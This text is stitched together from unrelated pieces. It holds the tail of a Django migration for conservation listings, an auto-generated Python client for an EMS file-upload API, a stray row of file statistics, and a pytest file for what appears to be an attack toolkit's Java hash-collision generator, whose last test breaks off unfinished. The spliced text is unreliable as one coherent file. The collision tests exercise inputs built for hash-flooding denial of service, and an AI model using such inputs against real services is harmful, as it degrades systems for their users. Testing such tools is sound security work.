field=models.PositiveIntegerField(choices=[(0, 'Manual entry'), (1, 'Threatened Fauna'), (2, 'Threatened Flora'), (
3, 'Threatened Communities')], default=0, help_text='Where was this record captured initially?', verbose_name='Data Source'),
),
migrations.AddField(
model_name='communitygazettal',
name='source_id',
field=models.CharField(blank=True, help_text='The ID of the record in the original source, if available.',
max_length=1000, null=True, verbose_name='Source ID'),
),
migrations.AddField(
model_name='taxongazettal',
name='scope',
field=models.PositiveIntegerField(choices=[(0, 'WA'), (1, 'CMW'), (2, 'INT'), (
3, 'AP')], default=0, help_text='In which legislation does this Gazettal apply?', verbose_name='Scope'),
),
migrations.AddField(
model_name='taxongazettal',
name='source',
field=models.PositiveIntegerField(choices=[(0, 'Manual entry'), (1, 'Threatened Fauna'), (2, 'Threatened Flora'), (
3, 'Threatened Communities')], default=0, help_text='Where was this record captured initially?', verbose_name='Data Source'),
),
migrations.AddField(
model_name='taxongazettal',
name='source_id',
field=models.CharField(blank=True, help_text='The ID of the record in the original source, if available.',
max_length=1000, null=True, verbose_name='Source ID'),
),
migrations.AddField(
model_name='conservationcategory',
name='rank',
field=models.PositiveIntegerField(
blank=True, help_text='Display order, lowest number goes first.', null=True, verbose_name='Rank'),
),
migrations.AddField(
model_name='conservationcriterion',
name='rank',
field=models.PositiveIntegerField(
blank=True, help_text='Display order, lowest number goes first.', null=True, verbose_name='Rank'),
),
migrations.RemoveField(
model_name='communitygazettal',
name='deactivated_on',
),
migrations.RemoveField(
model_name='taxongazettal',
name='deactivated_on',
),
migrations.AddField(
model_name='communitygazettal',
name='delisted_on',
field=models.DateTimeField(
blank=True, help_text='The date and time this Gazettal was de-listed, most likely superseded by another Gazettal.', null=True, verbose_name='De-listed on'),
),
migrations.AddField(
model_name='taxongazettal',
name='delisted_on',
field=models.DateTimeField(
blank=True, help_text='The date and time this Gazettal was de-listed, most likely superseded by another Gazettal.', null=True, verbose_name='De-listed on'),
),
migrations.CreateModel(
name='Document',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('document_type', models.PositiveIntegerField(choices=[(0, 'Recovery Plan'), (5, 'Interim Recovery Plan'), (10, 'Management Plan'), (20, 'Animal Ethics Application'), (
30, 'Fauna Translocation Proposal'), (40, 'Standard Operating Procedure')], default=0, help_text='The document type governs the approval process.', verbose_name='Document Type')),
('status', django_fsm.FSMIntegerField(choices=[(0, 'Proposed'), (40, 'In review with Branch Manager'), (45, 'In review with Regional Manager'), (50, 'In review with Division Director'), (20, 'In review with public'), (
60, 'In review with Director General'), (70, 'In review with Minister'), (80, 'Active'), (90, 'Closed'), (100, 'Rejected')], db_index=True, default=0, help_text='The approval status of the Gazettal.', verbose_name='Approval status')),
('effective_from', models.DateTimeField(
blank=True, help_text='The date from which this document is effective.', null=True, verbose_name='Effective from')),
('effective_to', models.DateTimeField(blank=True,
help_text='The date to which this document is effective.', null=True, verbose_name='Effective to')),
('effective_from_commonwealth', models.DateTimeField(
blank=True, help_text='The date from which this document was adopted by the Commonwealth.', null=True, verbose_name='Adopted by Commonwealth on')),
('effective_to_commonwealth', models.DateTimeField(
blank=True, help_text='The date on which this document was retired by the Commonwealth.', null=True, verbose_name='Retired by Commonwealth on')),
('review_due', models.DateTimeField(
blank=True, help_text='The date and time this Document should be reviewed.', null=True, verbose_name='Review due date')),
('title', models.CharField(help_text='A concise document title.', max_length=1000, verbose_name='Title')),
('comments', models.TextField(
blank=True, help_text='Optional comments on document approval and provenance.', null=True, verbose_name='Comments')),
('communities', models.ManyToManyField(blank=True, help_text='All communities this document applies to.',
to='taxonomy.Community', verbose_name='Communities')),
('taxa', models.ManyToManyField(blank=True, help_text='All taxa this document applies to.',
to='taxonomy.Taxon', verbose_name='Taxa')),
('team', models.ManyToManyField(blank=True, to=settings.AUTH_USER_MODEL,
verbose_name='Staff involved in the writing, approval, or publication of this document.')),
('source', models.PositiveIntegerField(choices=[(0, 'Manual entry'), (1, 'Threatened Fauna'), (2, 'Threatened Flora'), (
3, 'Threatened Communities')], default=0, help_text='Where was this record captured initially?', verbose_name='Data Source')),
('source_id', models.CharField(blank=True, help_text='The ID of the record in the original source, if available.',
max_length=1000, null=True, verbose_name='Source ID')),
('last_reviewed_on', models.DateTimeField(
blank=True, help_text='The date and time this Conservation Listing was last reviewed.', null=True, verbose_name='Last reviewed on')),
],
options={
'ordering': ['document_type', 'title'],
'verbose_name': 'Document',
'verbose_name_plural': 'Documents',
},
),
migrations.AlterModelOptions(
name='communitygazettal',
options={'verbose_name': 'Community Conservation Listing',
'verbose_name_plural': 'Community Conservation Listings'},
),
migrations.AlterModelOptions(
name='taxongazettal',
options={'verbose_name': 'Taxon Conservation Listing',
'verbose_name_plural': 'Taxon Conservation Listings'},
),
migrations.RemoveField(
model_name='communitygazettal',
name='delisted_on',
),
migrations.RemoveField(
model_name='communitygazettal',
name='gazetted_on',
),
migrations.RemoveField(
model_name='taxongazettal',
name='delisted_on',
),
migrations.RemoveField(
model_name='taxongazettal',
name='gazetted_on',
),
migrations.AddField(
model_name='communitygazettal',
name='effective_from',
field=models.DateTimeField(
blank=True, help_text='The date printed on the Departmental Gazettal notice containing this Conservation Listing.', null=True, verbose_name='Effective from'),
),
migrations.AddField(
model_name='communitygazettal',
name='effective_to',
field=models.DateTimeField(
blank=True, help_text='The date and time this Conservation Listing was de-listed or otherwise ceased to be in effect.', null=True, verbose_name='Effective to'),
),
migrations.AddField(
model_name='taxongazettal',
name='effective_from',
field=models.DateTimeField(
blank=True, help_text='The date printed on the Departmental Gazettal notice containing this Conservation Listing.', null=True, verbose_name='Effective from'),
),
migrations.AddField(
model_name='taxongazettal',
name='effective_to',
field=models.DateTimeField(
blank=True, help_text='The date and time this Conservation Listing was de-listed or otherwise ceased to be in effect.', null=True, verbose_name='Effective to'),
),
migrations.AlterField(
model_name='communitygazettal',
name='label_cache',
field=models.TextField(
blank=True, help_text='An auto-generated label for the Conservation Listing.', null=True, verbose_name='Gazettal label'),
),
migrations.AlterField(
model_name='communitygazettal',
name='proposed_on',
field=models.DateTimeField(
blank=True, help_text='The date and time this Conservation Listing was proposed on.', null=True, verbose_name='Proposed on'),
),
migrations.AlterField(
model_name='communitygazettal',
name='review_due',
field=models.DateTimeField(
blank=True, help_text='The date and time this Conservation Listing should be reviewed.', null=True, verbose_name='Review due date'),
),
migrations.AlterField(
model_name='communitygazettal',
name='status',
field=django_fsm.FSMIntegerField(choices=[(0, 'Proposed'), (10, 'In review with experts'), (20, 'In review with public'), (30, 'In review with panel'), (40, 'In review with Branch Manager'), (50, 'In review with Division Director'), (
60, 'In review with Director General'), (70, 'In review with Minister'), (80, 'Published'), (90, 'De-listed'), (100, 'Rejected')], db_index=True, default=0, help_text='The approval status of the Conservation Listing.', verbose_name='Approval status'),
),
migrations.AlterField(
model_name='taxongazettal',
name='label_cache',
field=models.TextField(
blank=True, help_text='An auto-generated label for the Conservation Listing.', null=True, verbose_name='Gazettal label'),
),
migrations.AlterField(
model_name='taxongazettal',
name='proposed_on',
field=models.DateTimeField(
blank=True, help_text='The date and time this Conservation Listing was proposed on.', null=True, verbose_name='Proposed on'),
),
migrations.AlterField(
model_name='taxongazettal',
name='review_due',
field=models.DateTimeField(
blank=True, help_text='The date and time this Conservation Listing should be reviewed.', null=True, verbose_name='Review due date'),
),
migrations.AlterField(
model_name='taxongazettal',
name='status',
field=django_fsm.FSMIntegerField(choices=[(0, 'Proposed'), (10, 'In review with experts'), (20, 'In review with public'), (30, 'In review with panel'), (40, 'In review with Branch Manager'), (50, 'In review with Division Director'), (
60, 'In review with Director General'), (70, 'In review with Minister'), (80, 'Published'), (90, 'De-listed'), (100, 'Rejected')], db_index=True, default=0, help_text='The approval status of the Conservation Listing.', verbose_name='Approval status'),
),
migrations.AlterField(
model_name='communitygazettal',
name='scope',
field=models.PositiveIntegerField(choices=[(0, 'WA'), (1, 'CWTH'), (2, 'IUCN'), (
3, 'AP')], default=0, help_text='In which legislation does this Gazettal apply?', verbose_name='Scope'),
),
migrations.AlterField(
model_name='taxongazettal',
name='scope',
field=models.PositiveIntegerField(choices=[(0, 'WA'), (1, 'CWTH'), (2, 'IUCN'), (
3, 'AP')], default=0, help_text='In which legislation does this Gazettal apply?', verbose_name='Scope'),
),
migrations.AddField(
model_name='communitygazettal',
name='last_reviewed_on',
field=models.DateTimeField(
blank=True, help_text='The date and time this Conservation Listing was last reviewed.', null=True, verbose_name='Last reviewed on'),
),
migrations.AddField(
model_name='taxongazettal',
name='last_reviewed_on',
field=models.DateTimeField(
blank=True, help_text='The date and time this Conservation Listing was last reviewed.', null=True, verbose_name='Last reviewed on'),
),
migrations.AddField(
model_name='conservationcategory',
name='current',
field=models.BooleanField(
db_index=True, default=True, help_text='Whether this category should be shown for new conservation listings.', verbose_name='Is current'),
),
migrations.AlterField(
model_name='communitygazettal',
name='status',
field=django_fsm.FSMIntegerField(choices=[(0, 'Proposed'), (10, 'In review with experts'), (20, 'In review with public'), (30, 'In review with panel'), (40, 'In review with Branch Manager'), (50, 'In review with Division Director'), (
60, 'In review with Director General'), (70, 'In review with Minister'), (80, 'Listed'), (90, 'De-listed'), (100, 'Rejected')], db_index=True, default=0, help_text='The approval status of the Conservation Listing.', verbose_name='Approval status'),
),
migrations.AlterField(
model_name='taxongazettal',
name='status',
field=django_fsm.FSMIntegerField(choices=[(0, 'Proposed'), (10, 'In review with experts'), (20, 'In review with public'), (30, 'In review with panel'), (40, 'In review with Branch Manager'), (50, 'In review with Division Director'), (
60, 'In review with Director General'), (70, 'In review with Minister'), (80, 'Listed'), (90, 'De-listed'), (100, 'Rejected')], db_index=True, default=0, help_text='The approval status of the Conservation Listing.', verbose_name='Approval status'),
),
]
# coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
from msrest.exceptions import HttpOperationError
from .. import models
class TransferOperations(object):
"""TransferOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.config = config
    def start_async(
            self, ems_system_id, request, custom_headers=None, raw=False, **operation_config):
        """Starts a new upload.

        :param ems_system_id: The ID of the EMS system on which to start a new
         upload.
        :type ems_system_id: int
        :param request: Information about the upload to start.
        :type request: ~emsapi.models.AdiEmsWebApiV2DtoUploadUploadRequest
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: object or ClientRawResponse if raw=true
        :rtype: object or ~msrest.pipeline.ClientRawResponse
        :raises:
         :class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
        """
        # Construct URL
        url = self.start_async.metadata['url']
        path_format_arguments = {
            'emsSystemId': self._serialize.url("ems_system_id", ems_system_id, 'int')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if custom_headers:
            header_parameters.update(custom_headers)

        # Construct body
        body_content = self._serialize.body(request, 'AdiEmsWebApiV2DtoUploadUploadRequest')

        # Construct and send request
        request = self._client.post(url, query_parameters, header_parameters, body_content)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200, 401, 500, 503]:
            raise HttpOperationError(self._deserialize, response)

        deserialized = None

        if response.status_code == 200:
            deserialized = self._deserialize('AdiEmsWebApiV2DtoUploadUploadParameters', response)
        if response.status_code == 401:
            deserialized = self._deserialize('AdiEmsWebApiModelError', response)
        if response.status_code == 500:
            deserialized = self._deserialize('AdiEmsWebApiModelError', response)
        if response.status_code == 503:
            deserialized = self._deserialize('AdiEmsWebApiModelError', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized
    start_async.metadata = {'url': '/v2/ems-systems/{emsSystemId}/uploads'}
    def chunk_async(
            self, ems_system_id, transfer_id, first, last, custom_headers=None, raw=False, **operation_config):
        """Uploads a chunk of a file. This will fail if any chunks have been
        skipped in the specified file.

        The practical limit for a single chunk is around 4MB, depending on
        the web server's configuration. If you receive 500 responses, try
        smaller chunk sizes.

        :param ems_system_id: The ID of the EMS system to which the client is
         uploading.
        :type ems_system_id: int
        :param transfer_id: The ID of the upload, returned originally by the
         upload start call.
        :type transfer_id: str
        :param first: The byte index of the first byte that will be uploaded.
        :type first: long
        :param last: The byte index of the last byte that will be uploaded.
        :type last: long
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: object or ClientRawResponse if raw=true
        :rtype: object or ~msrest.pipeline.ClientRawResponse
        :raises:
         :class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
        """
        # Construct URL
        url = self.chunk_async.metadata['url']
        path_format_arguments = {
            'emsSystemId': self._serialize.url("ems_system_id", ems_system_id, 'int'),
            'transferId': self._serialize.url("transfer_id", transfer_id, 'str'),
            'first': self._serialize.url("first", first, 'long'),
            'last': self._serialize.url("last", last, 'long')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        if custom_headers:
            header_parameters.update(custom_headers)

        # Construct and send request
        request = self._client.put(url, query_parameters, header_parameters)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200, 400, 401, 404, 500, 503]:
            raise HttpOperationError(self._deserialize, response)

        deserialized = None

        if response.status_code == 200:
            deserialized = self._deserialize('AdiEmsWebApiV2DtoUploadUploadResult', response)
        if response.status_code == 400:
            deserialized = self._deserialize('AdiEmsWebApiModelError', response)
        if response.status_code == 401:
            deserialized = self._deserialize('AdiEmsWebApiModelError', response)
        if response.status_code == 404:
            deserialized = self._deserialize('AdiEmsWebApiModelError', response)
        if response.status_code == 500:
            deserialized = self._deserialize('AdiEmsWebApiModelError', response)
        if response.status_code == 503:
            deserialized = self._deserialize('AdiEmsWebApiModelError', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized
    chunk_async.metadata = {'url': '/v2/ems-systems/{emsSystemId}/uploads/{transferId}/{first}/{last}'}
    def status(
            self, ems_system_id, transfer_id, custom_headers=None, raw=False, **operation_config):
        """Gets the status of an upload in progress.

        :param ems_system_id: The ID of the EMS system to which the client is
         uploading.
        :type ems_system_id: int
        :param transfer_id: The ID of the upload, returned originally by the
         upload start call.
        :type transfer_id: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: object or ClientRawResponse if raw=true
        :rtype: object or ~msrest.pipeline.ClientRawResponse
        :raises:
         :class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
        """
        # Construct URL
        url = self.status.metadata['url']
        path_format_arguments = {
            'emsSystemId': self._serialize.url("ems_system_id", ems_system_id, 'int'),
            'transferId': self._serialize.url("transfer_id", transfer_id, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        if custom_headers:
            header_parameters.update(custom_headers)

        # Construct and send request
        request = self._client.get(url, query_parameters, header_parameters)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200, 401, 404, 503]:
            raise HttpOperationError(self._deserialize, response)

        deserialized = None

        if response.status_code == 200:
            deserialized = self._deserialize('AdiEmsWebApiV2DtoUploadUploadStatus', response)
        if response.status_code == 401:
            deserialized = self._deserialize('AdiEmsWebApiModelError', response)
        if response.status_code == 404:
            deserialized = self._deserialize('AdiEmsWebApiModelError', response)
        if response.status_code == 503:
            deserialized = self._deserialize('AdiEmsWebApiModelError', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized
    status.metadata = {'url': '/v2/ems-systems/{emsSystemId}/uploads/{transferId}'}
    def finish_async(
            self, ems_system_id, transfer_id, custom_headers=None, raw=False, **operation_config):
        """Completes an existing upload in progress.

        <p>This will examine everything that has been transferred to make
        sure that it is intact, then give a status report in response.</p>
        <p>This call is only required when the file is being streamed (i.e.
        no totalSize was passed at the start of the upload). In that case,
        this call is necessary to tell the server that all data have been
        received.</p>

        :param ems_system_id: The ID of the EMS system to which the client is
         uploading.
        :type ems_system_id: int
        :param transfer_id: The ID of the upload, returned originally by the
         upload start call.
        :type transfer_id: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: object or ClientRawResponse if raw=true
        :rtype: object or ~msrest.pipeline.ClientRawResponse
        :raises:
         :class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
        """
        # Construct URL
        url = self.finish_async.metadata['url']
        path_format_arguments = {
            'emsSystemId': self._serialize.url("ems_system_id", ems_system_id, 'int'),
            'transferId': self._serialize.url("transfer_id", transfer_id, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        if custom_headers:
            header_parameters.update(custom_headers)

        # Construct and send request
        request = self._client.get(url, query_parameters, header_parameters)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200, 400, 401, 404, 503]:
            raise HttpOperationError(self._deserialize, response)

        deserialized = None

        if response.status_code == 200:
            deserialized = self._deserialize('AdiEmsWebApiV2DtoUploadUploadResult', response)
        if response.status_code == 400:
            deserialized = self._deserialize('AdiEmsWebApiModelError', response)
        if response.status_code == 401:
            deserialized = self._deserialize('AdiEmsWebApiModelError', response)
        if response.status_code == 404:
            deserialized = self._deserialize('AdiEmsWebApiModelError', response)
        if response.status_code == 503:
            deserialized = self._deserialize('AdiEmsWebApiModelError', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized
    finish_async.metadata = {'url': '/v2/ems-systems/{emsSystemId}/uploads/{transferId}/finish'}
    def cancel_async(
            self, ems_system_id, transfer_id, custom_headers=None, raw=False, **operation_config):
        """Cancels an existing upload in progress.

        If successful, this call will delete the file in progress and set the
        associated database record to canceled.

        :param ems_system_id: The ID of the EMS system to which the client is
         uploading.
        :type ems_system_id: int
        :param transfer_id: The ID of the upload, returned originally by the
         upload start call.
        :type transfer_id: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: object or ClientRawResponse if raw=true
        :rtype: object or ~msrest.pipeline.ClientRawResponse
        :raises:
         :class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
        """
        # Construct URL
        url = self.cancel_async.metadata['url']
        path_format_arguments = {
            'emsSystemId': self._serialize.url("ems_system_id", ems_system_id, 'int'),
            'transferId': self._serialize.url("transfer_id", transfer_id, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        if custom_headers:
            header_parameters.update(custom_headers)

        # Construct and send request
        request = self._client.get(url, query_parameters, header_parameters)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200, 400, 401, 404, 503]:
            raise HttpOperationError(self._deserialize, response)

        deserialized = None

        if response.status_code == 200:
            deserialized = self._deserialize('AdiEmsWebApiV2DtoUploadUploadResult', response)
        if response.status_code == 400:
            deserialized = self._deserialize('AdiEmsWebApiModelError', response)
        if response.status_code == 401:
            deserialized = self._deserialize('AdiEmsWebApiModelError', response)
        if response.status_code == 404:
            deserialized = self._deserialize('AdiEmsWebApiModelError', response)
        if response.status_code == 503:
            deserialized = self._deserialize('AdiEmsWebApiModelError', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized
    cancel_async.metadata = {'url': '/v2/ems-systems/{emsSystemId}/uploads/{transferId}/cancel'}
    def get_uploads(
            self, max_entries=None, custom_headers=None, raw=False, **operation_config):
        """Get a list of upload records from the server.

        For administrative users, this will return a list of all uploads;
        otherwise only the uploads associated with the current user will be
        returned.

        :param max_entries: The maximum number of entries to return; this is
         capped at 50, and 50 will be used if it's not specified.
        :type max_entries: int
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: object or ClientRawResponse if raw=true
        :rtype: object or ~msrest.pipeline.ClientRawResponse
        :raises:
         :class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
        """
        # Construct URL
        url = self.get_uploads.metadata['url']

        # Construct parameters
        query_parameters = {}
        if max_entries is not None:
            query_parameters['maxEntries'] = self._serialize.query("max_entries", max_entries, 'int')

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        if custom_headers:
            header_parameters.update(custom_headers)

        # Construct and send request
        request = self._client.get(url, query_parameters, header_parameters)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200, 401, 503]:
            raise HttpOperationError(self._deserialize, response)

        deserialized = None

        if response.status_code == 200:
            deserialized = self._deserialize('[AdiEmsWebApiV2DtoUploadUploadRecord]', response)
        if response.status_code == 401:
            deserialized = self._deserialize('AdiEmsWebApiModelError', response)
        if response.status_code == 503:
            deserialized = self._deserialize('AdiEmsWebApiModelError', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized
    get_uploads.metadata = {'url': '/v2/uploads'}
    def get_upload_processing_status(
            self, ems_system_id, transfer_id, custom_headers=None, raw=False, **operation_config):
        """Gets the EMS processing status for a single upload.

        When using this route, make sure to use EMS system and upload IDs
        that match. Results for IDs that do not exist will still return
        valid results, but will indicate that the upload processing is
        incomplete, which, while true, may be misleading.

        :param ems_system_id: The ID of the EMS server to query for the
         specified uploads.
        :type ems_system_id: int
        :param transfer_id: The ID of the upload for which to return status
         information.
        :type transfer_id: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: object or ClientRawResponse if raw=true
        :rtype: object or ~msrest.pipeline.ClientRawResponse
        :raises:
         :class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
        """
        # Construct URL
        url = self.get_upload_processing_status.metadata['url']
        path_format_arguments = {
            'emsSystemId': self._serialize.url("ems_system_id", ems_system_id, 'int'),
            'transferId': self._serialize.url("transfer_id", transfer_id, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        if custom_headers:
            header_parameters.update(custom_headers)

        # Construct and send request
        request = self._client.get(url, query_parameters, header_parameters)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200, 401, 503]:
            raise HttpOperationError(self._deserialize, response)

        deserialized = None

        if response.status_code == 200:
            deserialized = self._deserialize('AdiEmsWebApiV2DtoUploadUploadProcessingStatus', response)
        if response.status_code == 401:
            deserialized = self._deserialize('AdiEmsWebApiModelError', response)
        if response.status_code == 503:
            deserialized = self._deserialize('AdiEmsWebApiModelError', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized
    get_upload_processing_status.metadata = {'url': '/v2/ems-systems/{emsSystemId}/uploads/processing-status/{transferId}'}
    def get_upload_processing_status_multiple(
            self, ems_system_id, ids, custom_headers=None, raw=False, **operation_config):
        """Gets the EMS processing status for a set of uploads.

        When using this route, make sure to use EMS system and upload IDs
        that match. Results for IDs that do not exist will still return
        valid results, but will indicate that the upload processing is
        incomplete, which, while true, may be misleading.

        :param ems_system_id: The ID of the EMS server to query for the
         specified uploads.
        :type ems_system_id: int
        :param ids: The list of IDs of the uploads for which to return
         status information.
        :type ids: list[str]
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: object or ClientRawResponse if raw=true
        :rtype: object or ~msrest.pipeline.ClientRawResponse
        :raises:
         :class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
        """
        # Construct URL
        url = self.get_upload_processing_status_multiple.metadata['url']
        path_format_arguments = {
            'emsSystemId': self._serialize.url("ems_system_id", ems_system_id, 'int')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if custom_headers:
            header_parameters.update(custom_headers)

        # Construct body
        body_content = self._serialize.body(ids, '[str]')

        # Construct and send request
        request = self._client.post(url, query_parameters, header_parameters, body_content)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200, 400, 401, 503]:
            raise HttpOperationError(self._deserialize, response)

        deserialized = None

        if response.status_code == 200:
            deserialized = self._deserialize('{AdiEmsWebApiV2DtoUploadUploadProcessingStatus}', response)
        if response.status_code == 400:
            deserialized = self._deserialize('AdiEmsWebApiModelError', response)
        if response.status_code == 401:
            deserialized = self._deserialize('AdiEmsWebApiModelError', response)
        if response.status_code == 503:
            deserialized = self._deserialize('AdiEmsWebApiModelError', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized
    get_upload_processing_status_multiple.metadata = {'url': '/v2/ems-systems/{emsSystemId}/uploads/processing-status'}
| 42.929947 | 123 | 0.664301 | 2,620 | 24,513 | 6.045038 | 0.096947 | 0.040725 | 0.04243 | 0.053037 | 0.858 | 0.847645 | 0.842909 | 0.832428 | 0.825925 | 0.80812 | 0 | 0.012662 | 0.249337 | 24,513 | 570 | 124 | 43.005263 | 0.848052 | 0.332028 | 0 | 0.764259 | 1 | 0 | 0.132561 | 0.08693 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034221 | false | 0 | 0.011407 | 0 | 0.114068 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
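The `chunk_async` docstring above recommends chunks of roughly 4MB or less and states that skipped chunks cause the upload to fail, so a caller has to walk the file in order, computing the inclusive first/last byte index of each chunk. The helper below is an illustrative sketch of that index arithmetic only; it is not part of emsapi, and its name and signature are assumptions.

```python
def chunk_ranges(total_size, chunk_size=4 * 1024 * 1024):
    """Yield inclusive (first, last) byte indices for sequential chunks.

    Mirrors the contract of TransferOperations.chunk_async, which takes the
    byte index of the first and of the last byte of each chunk; chunks must
    be sent in order because the API rejects skipped chunks.
    """
    first = 0
    while first < total_size:
        # `last` is inclusive, hence the -1; the final chunk may be shorter.
        last = min(first + chunk_size, total_size) - 1
        yield first, last
        first = last + 1
```

A caller might loop over these ranges and pass each `(first, last)` pair to `chunk_async` alongside the upload's `transfer_id` returned by `start_async`.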
354ad24f8b314966a83f4e6deae2119a81e4fae9 | 2,492 | py | Python | test/exploits/hashes/collisions/test_java_fast.py | drjerry/acsploit | fbe07fb0eb651e3c5fc27a0dbdfcd0ec4c674381 | [
"BSD-3-Clause"
] | 107 | 2018-05-03T16:53:01.000Z | 2022-02-23T14:47:20.000Z | test/exploits/hashes/collisions/test_java_fast.py | drjerry/acsploit | fbe07fb0eb651e3c5fc27a0dbdfcd0ec4c674381 | [
"BSD-3-Clause"
] | 7 | 2019-04-28T00:41:35.000Z | 2021-05-04T20:35:54.000Z | test/exploits/hashes/collisions/test_java_fast.py | drjerry/acsploit | fbe07fb0eb651e3c5fc27a0dbdfcd0ec4c674381 | [
"BSD-3-Clause"
] | 16 | 2019-03-29T12:39:16.000Z | 2021-03-03T11:09:45.000Z | from exploits.hashes.collisions import java_fast
from exploits.hashes.collisions import java_common
from test.exploits.dummy_output import DummyOutput
from input.chars import CharGenerator


def test_run_small_collision_count():
    output = DummyOutput()
    n_collisions = 10
    hash_table_size = 2**32
    target = '42'
    java_fast.options['n_collisions'] = n_collisions
    java_fast.options['n_substrings'] = 100
    java_fast.options['target_type'] = 'image'
    java_fast.options['target'] = target
    java_fast.options['hash_table_size'] = hash_table_size
    java_fast.run(CharGenerator(), output)
    assert output.count() == n_collisions
    for i in output:
        assert java_common.java_hash(i, hash_table_size) == int(target)


def test_run_large_collision_count():
    output = DummyOutput()
    n_collisions = 10000
    hash_table_size = 2**32
    target = '42'
    java_fast.options['n_collisions'] = n_collisions
    java_fast.options['n_substrings'] = 10
    java_fast.options['target_type'] = 'image'
    java_fast.options['target'] = target
    java_fast.options['hash_table_size'] = hash_table_size
    java_fast.run(CharGenerator(), output)
    assert output.count() == n_collisions
    for i in output:
        assert java_common.java_hash(i, hash_table_size) == int(target)


def test_preimage():
    output = DummyOutput()
    n_collisions = 10
    hash_table_size = 2**32
    preimage_target = 'hello world'
    java_fast.options['n_collisions'] = n_collisions
    java_fast.options['n_substrings'] = 100
    java_fast.options['target_type'] = 'preimage'
    java_fast.options['target'] = preimage_target
